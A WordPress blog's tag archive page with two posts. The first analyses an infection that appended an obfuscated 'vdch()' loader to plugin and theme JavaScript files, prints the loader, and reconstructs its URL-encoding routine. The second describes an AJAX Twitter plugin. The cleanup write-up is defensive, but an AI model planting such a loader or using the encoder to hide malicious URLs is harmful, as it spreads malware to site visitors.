Tag Archives: WordPress

What the Hack?

I got an email today asking me for support. One of my WordPress setups had been reported to be hacked – resulting in a JavaScript redirect to a site distributing malware.

Searching for the hack itself or the redirect I couldn’t find anything useful (except for an entry in the Google support forum).

Every JavaScript file in wp-content/plugins and wp-content/themes was infected with a function added to the bottom of the script: “function vdch()”. Make sure your blogs are clean.

Update: As I just read in this forum, on stackoverflow and on wordpress, they seem to compromise php and html files too. I guess in my case they couldn’t by exploiting the WordPress vulnerability because its built-in editor only allows you to edit plugins and themes.

This is the script they’ve been using on the setup I had to clean up. It fails in Firefox but seems to run fine in Chrome.

function vdch() {
    if(document.all.length > 3) {
        var t = new Array(...);
        var dchid = "";
        for (j=0;j<t.length;j++) {
            var c_rgb = t[j];
            for (i=1;i<7;i++) {
                var c_clr = c_rgb.substr(i++,2);
                if (c_clr!="00") dchid += String.fromCharCode(
                        parseInt(c_clr,16)^i);
            }
        }
        var dch = document.createElement("script");
        dch.id = "dchid";
        dch.src = dchid;
        document.all[3].appendChild(dch);
    } else {
        setTimeout("vdch()",500);
    }
} setTimeout("vdch()",500);

Update 2: I was curious about how the string (=URL) encryption works in the script above. Here’s the function I came up with. Pretty nice idea (never had a look at JavaScript obfuscation before).

var url = "http://your.url/";
var enc = new Array();
var rgb = "#";

for (i = 0, j = 2; i < url.length; i++, j += 2) {
    rgb += (url.charCodeAt(i)^j).toString(16);
    if (j == 6) {
        j = 0;
        enc.push(rgb);
        rgb = "#";
    }
}

AJAXed Twitter Plugin for WordPress

Ricardo González wrote a nice plugin for WordPress that displays the public timeline of a twitter account in your WordPress theme.

Though the plugin works I found two major problems:

  • Sometimes Twitter doesn’t provide the timeline at first request.
  • Embedding it in your theme significantly slows down loading of the blog.

I came up with a solution to both of them (featuring MooTools or jQuery support) using XMLHttpRequest.

Basically all it does is wait until the page is loaded and then request the tweets. If Twitter decides not to provide the timeline, the request is sent again until a configurable number of retries is reached.

There are two ways to use this plugin:

  1. Configure it manually (see how-to below)
  2. Use it as a widget (version two and above)

If you use it as widget, simply use the management functionality for widgets provided by WordPress. Otherwise (if your theme doesn’t support widgets for example) you can set also it up manually as I did on this blog (because I use MooTools here).
Continue reading AJAXed Twitter Plugin for WordPress